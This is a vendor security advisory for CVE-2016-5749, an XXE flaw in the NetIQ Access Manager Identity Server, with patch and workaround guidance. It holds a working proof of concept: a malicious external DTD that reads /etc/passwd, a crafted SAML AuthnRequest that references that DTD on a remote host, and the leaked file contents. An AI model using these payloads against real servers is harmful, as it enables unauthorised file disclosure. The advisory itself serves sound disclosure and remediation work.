Access Manager Identity Server XXE vulnerability parsing incoming XML requests with DTD file referenced (CVE-2016-5749)

  • 7017806
  • 04-Jul-2016
  • 29-Aug-2016

Environment

NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
CVE-2016-5749

Situation

When the NAM identity server parses an incoming XML request, a number of validations take place depending on the configuration eg. certificate and signature validations. If no such checks are enabled and the Identity server processes an unauthenticated request such as a SAML AuthenRequest, it is possible to inject a reference in the request to an external DTD file which can be used to read any readable file on the host system.

As an example:

a) create a custom DTD file with the following parameters and place it on a public Web server

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "file:///nothere/%payload;">'>
%param1; %external;

b) POST the following SAMLRequest to a NAM 4.2 Identity Server - note the DOCTYPE entry pointing to a custom (named combine.dtd) file created in step a) above

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo SYSTEM "http://147.2.16.248/ff/combine.dtd"><samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_30c09a71e0f6114bca62b83fa8a0ef8c5c4c96eb9d" Version="2.0" IssueInstant="2016-05-24T08:20:52Z" Destination="https://nam42sba.lab.novell.com/nidp/saml2/sso" AssertionConsumerServiceURL="http://simplesaml109.lab.novell.com/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>http://simplesaml109.lab.novell.com/</saml:Issuer><samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient" AllowCreate="true"/><samlp:RequestedAuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef></samlp:RequestedAuthnContext></samlp:AuthnRequest>

c) Verify the contents of /etc/password are reported on the browser as shown below:

NAM42SBA Access Manager Landing Page
Unable to complete request at this time. (/nothere/at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash<br>
bin:x:1:1:bin:/bin:/bin/bash<br>
daemon:x:2:2:Daemon:/sbin:/bin/bash<br>
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash<br>
games:x:12:100:Games account:/var/games:/bin/bash<br>
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false<br>
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash<br>
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false<br>
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash<br>
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false<br>
mysql:x:60:107:MySQL database admin:/var/lib/mysql:/bin/false<br>
news:x:9:13:News system:/etc/news:/bin/bash<br>
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash<br>
ntp:x:74:109:NTP daemon:/var/lib/ntp:/bin/false<br>
polkituser:x:105:108:PolicyKit:/var/run/PolicyKit:/bin/false<br>
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false<br>
puppet:x:104:106:Puppet daemon:/var/lib/puppet:/bin/false<br>
root:x:0:0:root:/root:/bin/bash<br>
sshd:x:102:103:SSH daemon:/var/lib/sshd:/bin/false<br>
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash<br>
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash<br>
uuidd:x:103:105:User for uuidd:/var/run/uuidd:/bin/false<br>
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false<br>
config:x:1000:1000::/home/config:/bin/nash<br>
novlwww:x:107:112:Novell System User:/var/opt/novell/novlwww:/bin/bash<br>
novlagscd:x:108:1001:novell-agscd System User:/var/opt/novell/ag/sc:/bin/false<br>
activemqd:x:109:114:novell-activemq System User:/var/opt/novell/activemq:/bin/false (No such file or directory)-28142828381AE11D)
 

Resolution

Apply NAM 4.2.2 for NAM 4.2 release; or NAM 4.1.2 HF 1 for NAM 4.1 release.

To workaround the issue, make sure that signature validation is enabled on the Identity Server for all trusted Service Providers.

Feedback service temporarily unavailable. For content questions or problems, please contact Support.